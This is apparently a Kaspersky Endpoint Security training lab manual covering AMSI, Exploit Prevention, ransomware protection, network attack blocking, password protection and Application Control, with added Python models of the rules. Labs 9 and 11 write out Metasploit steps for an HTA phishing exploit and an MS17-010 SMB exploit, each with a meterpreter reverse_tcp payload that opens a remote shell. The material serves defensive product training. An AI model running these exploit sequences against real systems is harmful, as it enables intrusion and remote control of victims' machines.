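class Verdict:
    remote_ip: str
    action: str
    restored: List[str] = field(default_factory=list)


@dataclass
class SharedFolderGuard:
    action: str = BLOCK_CONNECTION
    exclusions: Set[str] = field(default_factory=set)      # trusted remote IPs
    backups: Dict[str, str] = field(default_factory=dict)  # originals' content
    blocked: Set[str] = field(default_factory=set)
    # per remote IP: originals for which an encrypted twin has been written
    pending: Dict[str, Set[str]] = field(default_factory=dict)

    def snapshot(self, path: str, content: str) -> None:
        """Keep a copy of a file before remote clients touch it; Block mode
        uses it to put the original back, as observed in the lab."""
        self.backups[path] = content

    def observe(self, ev: FileEvent) -> Optional[Verdict]:
        """Feed one SMB file operation; returns a verdict when the rule fires."""
        if ev.remote_ip in self.blocked:
            # The connection was dropped earlier: nothing more gets through.
            return Verdict(ev.remote_ip, BLOCK_CONNECTION)
        if ev.op in ("create", "write") and ev.path.endswith(ENCRYPTED_SUFFIX):
            original = ev.path[: -len(ENCRYPTED_SUFFIX)]
            if original in self.backups:
                self.pending.setdefault(ev.remote_ip, set()).add(original)
            return None
        if ev.op == "delete" and ev.path in self.pending.get(ev.remote_ip, set()):
            return self._react(ev.remote_ip, ev.path)
        return None

    def _react(self, ip: str, original: str) -> Verdict:
        if ip in self.exclusions:
            return Verdict(ip, EXCLUDED)      # 10.28.0.100 after the lab's exclusion
        if self.action == NOTIFY:
            return Verdict(ip, NOTIFY)        # event only, the file stays encrypted
        self.blocked.add(ip)                  # drop further access from this client
        return Verdict(ip, BLOCK_CONNECTION, restored=[original])


def simulate(guard: SharedFolderGuard, events: List[FileEvent]) -> List[Verdict]:
    """Run a stream of events through the guard and collect the verdicts."""
    return [v for v in (guard.observe(e) for e in events) if v is not None]


# Constructed sample stream: what ransomware2.bat does from Alex-Desktop
# (10.28.0.100) against \\tom-laptop\temp, plus a harmless write from the DC.
SAMPLE_EVENTS = [
    FileEvent("10.28.0.10", "write", "temp/report.txt"),
    FileEvent("10.28.0.100", "create", "temp/invoice.txt.aes"),
    FileEvent("10.28.0.100", "write", "temp/invoice.txt.aes"),
    FileEvent("10.28.0.100", "delete", "temp/invoice.txt"),
    FileEvent("10.28.0.100", "delete", "temp/invoice.txt.aes"),  # manual delete attempt
]


def run_default() -> List[Verdict]:
    """First run of the lab: action Block connection, no exclusions."""
    guard = SharedFolderGuard()
    guard.snapshot("temp/invoice.txt", "Invoice #1 (constructed content)")
    return simulate(guard, SAMPLE_EVENTS)


def run_with_exclusion() -> List[Verdict]:
    """Second run of the lab: action Notify and Alex-Desktop's IP excluded."""
    guard = SharedFolderGuard(action=NOTIFY, exclusions={"10.28.0.100"})
    guard.snapshot("temp/invoice.txt", "Invoice #1 (constructed content)")
    return simulate(guard, SAMPLE_EVENTS)
```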
Lab 8. How to test protection against fileless threats

Scenario. Recently, a new threat vector has become popular: it uses PowerShell, a powerful operating system administration and management tool. Criminals can run their code in the address space of a PowerShell process. A fileless attack is hard to detect since the malicious code is executed in memory, unlike an ordinary virus that stores its files on the local drive. Typically, attacks via PowerShell are performed after the machine has been compromised by other malicious actions, usually exploitation of software vulnerabilities.

Contents. In this lab, we will disable KSN and test how anti-malware scan interface (AMSI) detects fileless threats.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on Tom-Laptop.

Open the c:\temp\ folder
Unpack the bsstest_amsi archive
Enter the password infected

Press WIN+R
Type powershell
Click OK

Go to the directory of the unpacked script. Carry out:
cd c:\temp\bsstest_amsi\bsstest_amsi
Run the test PowerShell script. Carry out the following command:
.\bsstest_amsi.ps1

Make sure that Kaspersky Endpoint Security blocks the script

Open Kaspersky Endpoint Security reports
Select AMSI Protection
Make sure that Kaspersky Endpoint Security has detected and neutralized the threat

You’ve made sure that even if some of the protection components are disabled, Kaspersky Endpoint Security can efficiently interact with the script interpreters built into Microsoft Windows operating systems to detect and block malicious code.

Lab 9. How to check health of Exploit Prevention

Scenario. Criminals can exploit vulnerabilities much more easily than one would imagine. With such a powerful tool as Metasploit Framework, a criminal can create an exploit and send it to unsuspecting company employees.

Contents. In this lab, we will:

Simulate a hacker attack to get access to a remote computer
Disable most of the protection components
Test protection against exploits

On the Kali computer, run the Metasploit Framework penetration testing utility. The attack uses an HTA (HTML Application) file.

The KSC, DC, Kali, Alex-Desktop and Tom-Laptop machines must be powered on.

Start the task on the Alex-Desktop machine.

Exit Kaspersky Endpoint Security. Right-click its icon in the notification area; on the menu, select Exit

Switch to the Kali computer.

Log on to the hacker account. Password: Ka5per5Ky
Open a Terminal window

Start the Metasploit Framework console. Carry out the following command:
msfconsole

Select the exploit template. Carry out the following command:
use exploit/windows/misc/hta_server

You can use the TAB key to autocomplete commands

Display the list of applications vulnerable to this exploit. Carry out the following command:
show targets

Set a target. Carry out the following command:
set target 1

Specify the malicious payload. Carry out the following command:
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50

Activate the exploit. Carry out the following command:
exploit -j

Copy the http://10.28.0.50:8080/*******.hta link to the clipboard (select Copy Link on the shortcut menu)
Open a new terminal instance
In the terminal, type
mailsend
Specify the following parameters:
— SMTP server address/IP = 10.28.0.10
— From = tom@abc.lab
— To = alex@abc.lab
— Subject = Report
Press ENTER
Paste the link from step 11: http://10.28.0.50:8080/*******.hta
Press ENTER
Type one dot “.”
Press ENTER

Switch to the Alex-Desktop machine.

Open Microsoft Outlook
Select the received message
Open the link from the message in a browser
Save the file to the computer

In the warning window, click Run

Switch to the Kali computer.

Open the Metasploit Framework console.
Make sure that a new session has been opened

To connect to the created session, carry out:
sessions 1
where 1 is the number of the recently created session

You have got full remote access to the Alex-Desktop machine



To run the command prompt, carry out the following command:
shell
(Optional) Carry out the whoami command to get the name of the active user:
whoami

In this task, you will disable some of the Kaspersky Endpoint Security protection components.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application settings tab
Disable the following protection components:
— KSN
— Behavior Detection

Switch to the Security Controls section
Disable the following protection components:
— Application Control
— Adaptive Anomaly Control

Go to the Essential Threat Protection section
Disable the following protection components:
— File Threat Protection
— Web Threat Protection
— Mail Threat Protection
— AMSI Protection
Click Save to save the policy
Click Yes to confirm
Wait for the policy to be applied

In this task, you will test the Exploit Prevention component.

Start the task on the Alex-Desktop machine.

Close the web browser window
Restart the Alex-Desktop computer
Log on to the system

Open the main window of Kaspersky Endpoint Security
Click the Security menu on the left

Make sure that the Exploit Prevention component is enabled

Open the Downloads directory
Run the *.hta file

Note that a script run error has occurred
In the Script Error window, click No

Open Kaspersky Endpoint Security reports
Switch to the report of the Exploit Prevention component
Make sure that the exploit was detected

Switch to the Kali computer.

Log on to the hacker account. Password: Ka5per5Ky
Open the Metasploit console
Press CTRL+C to interrupt the current process
Press Y to confirm and then press ENTER

Carry out the following command:
background

Carry out the following command:
sessions
Note that there are no active sessions on the criminal’s computer

In this lab, we made sure that the multitier defense system of Kaspersky Endpoint Security repels advanced
threats even when the main protection components are disabled.
Lab 10. Improve workstations’ protection against ransomware

Scenario. Of all threats, you are most concerned about crypto ransomware. If Kaspersky Endpoint Security fails to detect a new malware version one day, the company will lose much money. To decrease the risk, configure Host Intrusion Prevention to prohibit all programs except for trusted ones from editing documents on the computers.

Contents. In this lab, we will:

Simulate a ransomware infection
Prohibit all programs except for trusted ones from editing and deleting documents
Configure Host Intrusion Prevention events to be stored on the Administration Server
Simulate encrypting a document and check the result

Find the ransomware.bat script on the desktop of the Tom-Laptop computer and run it. It is designed to
encrypt text documents and delete the original files.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on Alex-Desktop.

Find the ransomware.bat and invoice.txt files on the desktop
Run the ransomware.bat file
Make sure that the invoice.txt file has gone and the invoice.txt.aes file has appeared instead

Open the invoice.txt.aes file in Notepad
Make sure that the invoice.txt.aes file is encrypted
Close Notepad

Open the Host Intrusion Prevention settings in the Kaspersky Endpoint Security policy. Find the list of
protected resources. Create a Documents category. Add files with the *.txt extension to it. Prohibit all programs
except for trusted from editing, deleting and creating files of this category.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application settings tab
In the Advanced Threat Protection section, click Host Intrusion Prevention

Enable the Host Intrusion Prevention component
To open the list of rights, click the link Application rights and protected resources

To create a new category, in the left pane, click Add

Select Category of protected resources
Type Protected files for the category name
Click the link Operating system

Select the Personal data subcategory
Click OK twice

Add a subcategory: In the left pane, click Add

Select Category of protected resources
Type Documents for the name
Click the Operating system link

Select the Protected Files subcategory
Click OK twice

Add file types to the category. In the left pane, click Add

For the resource type, select File or folder
In the Path to file or folder box, enter *.txt, and in the Display name for the list of categories field, type txt
Click the link Operating system

Select the Documents subcategory
Click OK twice

To select the category Personal Data | Protected files, click on an empty space within the Protected files row
To prohibit applications that have Low and High Restricted reputation from editing files that belong to this category, change the action for Write, Delete and Create operations to Block
Configure Host Intrusion Prevention to log attempts to edit documents. Enable Log events: Write, Delete and Create for all the block actions

Click OK twice to save the application rights
Click Save to save the policy
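The rights just configured can be modelled to see why, later in this lab, ransomware.bat is able to create invoice.txt.aes yet cannot delete invoice.txt: the *.txt mask covers only the original, and the Block action applies to the Low Restricted and High Restricted groups but not to Trusted programs. The Python below is an added example and not Kaspersky code: trust groups, operations, category names and the observed outcome come from the lab; the evaluation order, the assumption that an unknown script lands in Low Restricted, and the event text are simplifications of this model.

```python
"""Model of the Host Intrusion Prevention rights configured in this lab.
Added example, not Kaspersky code; see the lead-in for assumptions.
"""
from dataclasses import dataclass, field
from fnmatch import fnmatchcase
from typing import Dict, List, Tuple

TRUSTED = "Trusted"
LOW_RESTRICTED = "Low Restricted"
HIGH_RESTRICTED = "High Restricted"
ALLOW, BLOCK = "Allow", "Block"


@dataclass
class ProtectedCategory:
    name: str
    masks: List[str]                      # e.g. ["*.txt"]
    rules: Dict[Tuple[str, str], str]     # (trust group, operation) -> action
    log_blocks: bool = True               # "Log events" ticked for the Block actions

    def covers(self, path: str) -> bool:
        # The mask is matched against the file name, whatever the directory.
        name = path.replace("\\", "/").rsplit("/", 1)[-1]
        return any(fnmatchcase(name.lower(), m.lower()) for m in self.masks)


@dataclass
class HostIntrusionPrevention:
    categories: List[ProtectedCategory]
    events: List[str] = field(default_factory=list)   # what the Administration Server receives

    def check(self, app: str, group: str, op: str, path: str) -> str:
        """Return Allow or Block for one file operation by an application."""
        for cat in self.categories:
            if not cat.covers(path):
                continue
            # Groups/operations without an explicit rule are allowed in this model.
            action = cat.rules.get((group, op), ALLOW)
            if action == BLOCK:
                if cat.log_blocks:
                    self.events.append(
                        f"Host Intrusion Prevention was triggered: {app} ({group}) "
                        f"{op} on {path} blocked by rule for category {cat.name}")
                return BLOCK
        return ALLOW


def lab_policy() -> HostIntrusionPrevention:
    """The category and rights the lab creates in the policy."""
    rules = {(g, op): BLOCK
             for g in (LOW_RESTRICTED, HIGH_RESTRICTED)
             for op in ("Write", "Delete", "Create")}
    documents = ProtectedCategory("Personal data | Protected files | Documents",
                                  ["*.txt"], rules, log_blocks=True)
    return HostIntrusionPrevention([documents])


def replay_ransomware(hip: HostIntrusionPrevention) -> Dict[str, str]:
    """Constructed replay of what ransomware.bat does on Alex's desktop; the
    script is assumed to be in Low Restricted, as an unknown program would be."""
    desktop = r"C:\Users\Alex\Desktop"
    ops = [("Create", desktop + r"\invoice.txt.aes"),   # encrypted copy: not *.txt
           ("Delete", desktop + r"\invoice.txt")]       # original: covered by *.txt
    return {op: hip.check("ransomware.bat", LOW_RESTRICTED, op, path) for op, path in ops}


if __name__ == "__main__":
    hip = lab_policy()
    print(replay_ransomware(hip))        # {'Create': 'Allow', 'Delete': 'Block'}
    print(hip.check("WINWORD.EXE", TRUSTED, "Write", r"C:\Users\Alex\Desktop\notes.txt"))
    for line in hip.events:
        print(line)
```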

Open event settings in the policy. Find information events of Host Intrusion Prevention: Application placed in
restricted group and Application Privilege Control rule triggered. Configure the policy to store these events
on the Administration Server.

The task is performed on KSC.

Open the properties of the Kaspersky Endpoint Security for Windows policy

Go to the Event configuration tab and switch to the Info section
Click Add events

Select the events Application placed in restricted group and Host Intrusion Prevention was triggered
Click OK
Click Save to save the policy

On the side menu, select Monitoring & Reporting | Event Selections
To create a new event selection, click Add

Type Host Intrusion Prevention Events for the selection name

Switch to the Events section
In the Application name field, select Kaspersky Endpoint Security
Specify the Severity level: Info
Select the option Include selected general events
Clear all checkboxes: On each of the 4 pages, clear the checkbox next to Severity level

On the list of events, select
— Application placed in restricted group
— Host Intrusion Prevention was triggered
Click Save

Find the ransomware.bat script on the desktop of the Alex-Desktop computer and run it. It is designed to encrypt
text documents and delete the original files. Make sure that the script cannot delete the text file this time.

Consult the Host Intrusion Prevention events on the Administration Server. Make sure that it was Host
Intrusion Prevention that did not allow the script to delete the text document.

The task is performed on Alex-Desktop.

Find the ransomware.bat and invoice.txt files on the desktop
Run the ransomware.bat file

Make sure that the invoice.txt.aes file has appeared on the desktop, but the invoice.txt file has not been deleted

Open Kaspersky Security Center Web Console
On the side menu, select Monitoring & Reporting | Event Selections
Select Host Intrusion Prevention Events
Click Reconfigure sorting and start to display the event selection
Study the events in the selection. Make sure that it was Host Intrusion Prevention that did not allow the program to delete the document

You have configured Host Intrusion Prevention to allow only trusted programs to edit text documents. To properly protect against ransomware, add more document types to the category: *.doc, *.docx, *.xlsx, etc.

Programs by known vendors (such as Microsoft Office) are trusted, and Host Intrusion Prevention will not restrict them. Ransomware, even new samples that have not yet been added to the signature database or KSN, will never get into the trusted category and will not be able to edit documents.

Lab 11. How to test Network Threat Protection

Scenario. You scan your network periodically with a special security scanner to find out whether the computers
are properly shielded. Kaspersky Endpoint Security blocks attacks on the scanned computers and then blocks any
connections from the attacking computer for an hour. Add the computer from which you perform vulnerability
scanning to the list of exclusions.

Contents. In this lab, we will:

Disable Exploit Prevention
Imitate a network attack from Kali on Alex-Desktop
Study the Network attack report
Unblock the Kali computer
Configure the Network Threat Protection not to block Kali
Imitate an attack from Kali on Alex-Desktop and check the results

To check health of Network Threat Protection, we will use the Metasploit Framework penetration testing utility.
In this task, you will disable the Exploit Prevention protection component because it may react earlier than
Network Threat Protection.

The KSC, DC, Kali, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application settings tab
Disable Exploit Prevention

On the Kali computer, run the Metasploit Framework penetration testing utility. Carry out an attack that exploits
a vulnerability in the Server Message Block protocol.

The task is performed on Kali.

Log on to the hacker account. Password: Ka5per5Ky
Run the terminal

Start the Metasploit Framework console. Carry out the following command:
msfconsole

Select the exploit template. Carry out the following command:
use exploit/windows/smb/ms17_010_psexec

Specify the malicious payload. Carry out the following command:
set payload windows/x64/meterpreter/reverse_tcp

Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50

Specify the address of the victim machine. Carry out the following command:
set RHOSTS 10.28.0.100

Specify the victim’s account. Carry out the following command:
set smbuser alex

Specify the victim’s password. Carry out the following command:
set smbpass Ka5per5Ky

Activate the exploit. Carry out the following command:
exploit
Note that you cannot exploit the vulnerability

The attack fails because Kaspersky Endpoint Security blocks network attacks by default.

Find the list of reports in the Administration Console. Create a new template for the Network attack report.
Generate the report, consult the details of the network attack, find the addresses of the attacking and
attacked machines.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Monitoring & Reporting | Reports
Click Add

Name the report Network Attack Report
Under Threat statistics, select the report type Report on network attacks
Click Next

Click Next

Select to include information over the last 30 days
Click OK

In the message box, click Save and run

Switch to the Details tab

Find the IP address of the attacking computer and the DNS name of the attacked machine in the report
Close the report

On the side menu, click Event Selections
Click Add to create a new event selection

Name the selection Network attacks

Switch to the Events section
In the Application name field, select Kaspersky Endpoint Security
For the Severity level, select Critical
Choose Include selected general events

On the list of events, find and select the Network attack detected event
Click Save to save the event selection

In the message window, select the checkbox Go to selection result and click Save

Study the events in the selection

Open Kaspersky Endpoint Security on the attacked computer. Open the Network Monitor window. Find the list
of blocked computers and unblock the Kali computer.

The task is performed on Alex-Desktop.

Open the Kaspersky Endpoint Security interface:
Click its icon in the notification area
Click Network Monitor

The Network Monitor window will open

Switch to the Blocked computers section

Unblock the Kali computer: Select address 10.28.0.50 and click Unblock
Close all Kaspersky Endpoint Security windows

In the Kaspersky Endpoint Security policy, open the Network Attack Blocker settings. Find the list of
trusted computers and add the IP address of the Kali computer (10.28.0.50) to it.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application settings tab
Go to the Essential Threat Protection section
Click the link Network Threat Protection

Open the list of trusted computers: Click the link Exclusions

Click Add
Type the IP address of the Kali computer, 10.28.0.50, and click OK

Click OK
Click Save to save the policy
Wait for the policy to be applied

Simulate another attack on the computer Alex-Desktop from Kali using Metasploit Framework. Make sure
that Kaspersky Endpoint Security does not react to this attack anymore.

The task is performed on Kali.

Log on to the hacker account. Password: Ka5per5Ky
Open a Terminal window

Activate the exploit again. Carry out the following command:
exploit

Make sure that you have exploited the vulnerability in the SMB protocol

Access the standard shell on the target system. Carry out:
shell

Optional: carry out the dir command to display the directories


You have configured Network Threat Protection not to react to attacks from the specified IP address. You can use this method to exclude addresses of network security scanners.

Also, you have created a new report and a new event selection. There are many types of reports in Kaspersky Security Center. If the pre-configured reports available on the Reports tab are insufficient, have a look at the complete list of reports that you can create. If none of them yet meets your needs, create a selection of events that interest you. Configure conditions: event types, time, group of computers, etc.

KL 002.11.6: Lab 12.
Kaspersky Endpoint Security and Management How to configure password protection

Scenario. To prevent the users from disabling the protection, prohibit managing Kaspersky Endpoint Security
and Network Agent without a password.

Contents. In this lab, we will:
Find a computer where protection is disabled
Set a password for local management of Kaspersky Endpoint Security
Make sure that Kaspersky Endpoint Security is password-protected
Set a password for Network Agent uninstallation

On Tom-Laptop, exit Kaspersky Endpoint Security.

Using the web console’s Dashboard, find information that protection is disabled on some computers. Go to the
selection of computers where protection is off. Open the computer properties, find the Kaspersky Endpoint
Security application and start it.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

Start the task on Tom-Laptop.

Log on to the abc\Tom account. Password—Ka5per5Ky
Exit Kaspersky Endpoint Security using the shortcut menu of its icon

Switch to the KSC computer
Log on to the abc\Administrator account. Password—Ka5per5Ky
Open Kaspersky Security Center Web Console
On the side menu, select Monitoring & Reporting | Dashboard
Note that one of the devices has the Critical protection status
Click the Critical link to consult the list of devices that have this status
Make sure that protection is not running on Tom-Laptop
Click the Tom-Laptop link to open the device properties
Switch to the Applications tab
Select Kaspersky Endpoint Security and click Start
Close the computer properties

On the side menu, select Monitoring & Reporting | Dashboard
Note that the protection status has changed

In the policy of Kaspersky Endpoint Security for workstations, find password protection among the Interface
settings. Enable password protection and apply it to critical operations with Kaspersky Endpoint Security.

On the Tom-Laptop computer, try to exit Kaspersky Endpoint Security. Make sure that you cannot exit the
application without the password. Try to uninstall Kaspersky Endpoint Security through the Windows Control
Panel. Make sure that this operation is also password-protected.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles

Open the policy of Kaspersky Endpoint Security for Windows
Switch to the Application settings tab
In the General settings section, click Interface
Click the Password protection DISABLED switcher
Enter the password Ka5per5Ky
Click OK
Click Add to specify a user
Click the link Select user

In the search box, type alex
Choose the Alex account
Click Select
Select the following operations:
— Application settings
— Remove / modify / restore the application
— Disable Kaspersky Security Center policy
— Exit the application
Click OK
Make sure that the Alex user has been added to the list
Click OK to save the changes
Save the policy: Click Save and Yes
Wait for the policy to be applied

Make sure that you need to enter credentials to perform some actions within the program.

The task is performed on Tom-Laptop.

Log on to the abc\Tom account. Password—Ka5per5Ky
Try to exit KES using the shortcut menu of its icon in the taskbar
In the Password check window, enter the abc\Alex account and password Ka5per5Ky
Make sure that the application has been closed successfully
Open the Apps & features settings
Select Kaspersky Endpoint Security for Windows
Make sure that the Uninstall button appears dimmed

Open the Network Agent policy and find the password protection settings there. Enable password protection, type
a password and make these settings required (prohibit users from modifying them).

On the Tom-Laptop computer, try to uninstall the Network Agent. Do not enter the password and make sure
that you cannot uninstall Network Agent without it.

Start the task on the KSC machine.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Security Center Network Agent
Switch to the Application settings tab
In the Settings section, enable password protection: Use uninstallation password
Enter the password Ka5per5Ky
Enforce the Use uninstall password setting (lock it) and click Save
Wait for the policy to be applied

Switch to Tom-Laptop.

Open the Apps & features settings
Select Kaspersky Security Center Network Agent
Click Uninstall to try to remove it
In the Windows information window, confirm that you want to uninstall the application
On the welcome page of the uninstallation wizard, click Next
Click Next without entering a password
Make sure that Network Agent cannot be uninstalled without the password
Click OK to close the error message
Click Cancel to exit the wizard
Confirm that you want to exit: Click Yes
Click Finish to close the wizard

You have enabled password protection for Kaspersky Endpoint Security and Network Agent. Now the users cannot uninstall Kaspersky applications, exit Kaspersky Endpoint Security or stop protection.

Neither can they stop the service or process of Kaspersky Endpoint Security: Kaspersky Endpoint Security self-defense prevents this.

To hide the fact that Kaspersky Endpoint Security is installed on the computer from the users, select not to display the KES icon in the notification area. This setting is located in the Interface section of the Kaspersky Endpoint Security policy.
KL 002.11.6: Lab 13.
Kaspersky Endpoint Security and Management How to configure Application Control

Scenario. According to the corporate security policy, Internet Explorer is the only allowed web browser. All available security updates are downloaded for it on a regular basis, while the updates of other browsers are not. Considering the fact that malware typically penetrates a network through browsers today, the decision was made to prohibit all other browsers.

Your task is to enforce the security policy requirements. You need to block all browsers except for Internet
Explorer using Application Control.

Contents. In this lab, we will:
Create a category for all web browsers except Internet Explorer
Prohibit the users from starting any web browsers except for Internet Explorer
Run Mozilla Firefox and Internet Explorer

Create an application category that includes all browsers except for Internet Explorer 11.0 or later. To add all
browsers, use Kaspersky (KL) categories. To exclude Internet Explorer, use the metadata of the iexplore.exe file.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Operations | Third-party applications | Application categories
To create a new category, click Add
Specify Browsers for the category name

For the category creation method, select Category with content added manually
Click Next
To specify a new condition for the category, click Add
Select From KL category
Click Next
Select the category Browsers | Web Browsers
Click Next
Click Next



Specify exclusions. Click Add
On the list of exclusion conditions, choose Hash, metadata or certificate
On the drop-down list, select Specify manually
Click Next
Switch the condition to Metadata
Select File Name
Type IEXPLORE.EXE (Important: in capital letters)
Click Next
Click OK

Open the Application Control settings in the policy. Enable Application Control and select the Block mode
instead of Notify.

Add a rule that prohibits starting programs of the Browsers category that you created in the previous task.

The task is performed on KSC.

On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows
Switch to the Application settings tab
Select the Security Controls section
Select the Application Control component
Enable Application Control
Switch the component to the block mode: select Kaspersky Endpoint Security for Windows blocks startup of applications that are blocked by Application Control settings
Click the link Rules Lists Settings

Add a category to the denylist. Click Add
Click the link Please choose a category
Select the Browsers category
Click OK

Make sure that the Browsers category is blocked for all users
Click OK
Enable this category if it has not been enabled automatically
Click OK
Save the policy: Click Save and Yes
Wait for the policy to be applied

Make sure that the users are able to launch Internet Explorer but not Mozilla Firefox.

The task is performed on Alex-Desktop.

Log on to the abc\Alex account, password Ka5per5Ky
Run the Mozilla Firefox browser
Note that Kaspersky Endpoint Security blocks Firefox and informs the user about it
Click OK to close the error message
Run the Internet Explorer browser
Make sure that Kaspersky Endpoint Security does not block Internet Explorer

If you need to allow or prohibit a group of programs, Kaspersky categories come in very handy. The categories
are updated when database updates are run, and you can feel confident that the latest versions of popular
browsers are added and applied automatically.

When setting up Application Control, remember: Rules configured to deny access will always have a higher
priority than ones that allow access. For this reason, if you need to prohibit a program category except for a few
applications, you will need to create a rule to block access and add exclusions for the allowed applications, which
was demonstrated in this lab. Any other configuration will not work.
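The precedence rule described above, worked through as an added example (this is not Kaspersky's code and not the product's implementation): a small Python model of the Lab 13 configuration, in which the membership of the KL category "Browsers | Web Browsers", the file metadata values, the Everyone group and the abc\Alex principal are all constructed assumptions.

```python
"""Model of the Lab 13 Application Control configuration.

Added example, not Kaspersky code: the KL category membership, the file
metadata and the rule set are constructed to mirror the lab (a "Browsers"
category built from "Browsers | Web Browsers", an exclusion on the file
name IEXPLORE.EXE, a deny rule for Everyone) so the evaluation order can
be checked offline.
"""
from dataclasses import dataclass, field

# Constructed stand-in for the KL category "Browsers | Web Browsers".
# In the product this list is maintained by Kaspersky and refreshed with
# the database updates; here it is a fixed set of File Name metadata values.
KL_CATEGORIES = {
    "Browsers | Web Browsers": {
        "FIREFOX.EXE", "CHROME.EXE", "IEXPLORE.EXE", "OPERA.EXE",
    },
}


@dataclass
class Category:
    """A manually filled category: KL categories plus metadata exclusions."""
    name: str
    kl_categories: set = field(default_factory=set)
    excluded_file_names: set = field(default_factory=set)

    def contains(self, file_name: str) -> bool:
        # Exclusions are compared verbatim (an assumption that mirrors the
        # lab's note to type IEXPLORE.EXE in capital letters).
        if file_name in self.excluded_file_names:
            return False
        return any(file_name in KL_CATEGORIES[k] for k in self.kl_categories)


@dataclass
class Rule:
    category: Category
    action: str        # "deny" (denylist) or "allow"
    subjects: set      # users or groups the rule applies to, e.g. {"Everyone"}
    enabled: bool = True


def evaluate(rules, file_name, principals, default="allow"):
    """Decide a start attempt; returns (decision, reason).

    All matching rules are collected first because, as the lab summary
    says, a deny rule always outranks an allow rule for the same file.
    """
    matching = [
        r for r in rules
        if r.enabled and r.category.contains(file_name) and r.subjects & principals
    ]
    denies = [r for r in matching if r.action == "deny"]
    if denies:
        return "deny", f"denylist rule for category {denies[0].category.name}"
    if any(r.action == "allow" for r in matching):
        return "allow", "allow rule matched"
    return default, "no rule matched, default applies"


def lab13_rules():
    """The rule set the lab ends up with: Browsers denied for Everyone."""
    browsers = Category("Browsers", {"Browsers | Web Browsers"}, {"IEXPLORE.EXE"})
    return [Rule(browsers, "deny", {"Everyone"})]


def lab13_decisions(rules=None):
    """Start attempts by abc\\Alex, who is a member of Everyone."""
    rules = lab13_rules() if rules is None else rules
    alex = {"abc\\Alex", "Everyone"}
    return {
        f: evaluate(rules, f, alex)[0]
        for f in ("FIREFOX.EXE", "IEXPLORE.EXE", "NOTEPAD.EXE")
    }


def allow_rule_does_not_override():
    """An allow rule for Alex on the same category still loses to the deny."""
    rules = lab13_rules()
    rules.append(Rule(rules[0].category, "allow", {"abc\\Alex"}))
    return evaluate(rules, "FIREFOX.EXE", {"abc\\Alex", "Everyone"})[0]


def exclusion_typed_in_lower_case():
    """Why the lab insists on capital letters: 'iexplore.exe' does not match
    the stored metadata value, so Internet Explorer stays in the category
    and is blocked along with the other browsers."""
    browsers = Category("Browsers", {"Browsers | Web Browsers"}, {"iexplore.exe"})
    rules = [Rule(browsers, "deny", {"Everyone"})]
    return evaluate(rules, "IEXPLORE.EXE", {"Everyone"})[0]


if __name__ == "__main__":
    print(lab13_decisions())                # FIREFOX.EXE deny, IEXPLORE.EXE allow, NOTEPAD.EXE allow
    print(allow_rule_does_not_override())   # deny
    print(exclusion_typed_in_lower_case())  # deny
```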

KL 002.11.6: Lab 14.
Kaspersky Endpoint Security and Management How to block start of unknown applications in the network

Scenario. Application Control, as well as Host Intrusion Prevention, can help reduce the risk related to new malware. Let us configure Application Control to block the start of all files except for trusted ones within specific operating system directories.

Contents. In this lab, we will:
Create an application category that prohibits starting unknown files
Change the policy so as to prohibit all users from starting unknown files
Make sure that the settings work correctly

In this task, you will create an application category for crypto ransomware.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
Go to Operations | Third-party applications | Application Categories
Click Add to create a new category
Type Protection Cryptomalware for the category name
For the category creation method, select Category with content added manually
Click Next

To create a condition, click Add
Copy the Conditions_Protection_Cryptomalware.txt file to your desktop. The file is located in “Z:\LabFiles\Lab14\”
Open the file Conditions_Protection_Cryptomalware.txt in Notepad
Select Specify path to application (masks supported)
Click Next
Select and copy the first line from the file Conditions_Protection_Cryptomalware.txt
Paste the copied line and click Next
Click Add to include the other values

In a similar manner, add all other paths from Conditions_Protection_Cryptomalware.txt
Click Next
Specify exclusions. Click Add
Select From KL category
Click Next

Select all KL categories
Click Next
Click OK

Confirm creating the category. Click OK

Open the Application Control settings in the policy. Enable Application Control and select the Block mode
instead of Notify.

Add a rule that prohibits starting programs of the Protection_Cryptomalware category that you created in
the previous task.

The task is performed on KSC.

On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows
Switch to the Application Settings tab
Select the Security Controls section
Select the Application Control component

Click the link Rules Lists Settings
Click Add
Click the link Please choose a category
On the list of categories, select Protection Cryptomalware
Click OK

Click OK
Click OK
Click OK
Save the policy: Click Save and Yes
Wait for the policy to be applied

In this task, you will make sure that Kaspersky Endpoint Security blocks start of unknown files.

Start the task on the Alex-Desktop machine.

Log on to the abc\Alex account, password Ka5per5Ky
Double-click ransomware.bat to run it
Note that KES blocks ransomware.bat and displays the corresponding notification
Click OK to close the error message

Switch to the KSC computer

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows
Switch to the Application settings tab
Select the Security Controls section
Select the Application Control component
Disable the Application Control component
Click OK
Click Save to save the policy
Wait for the policy to be applied

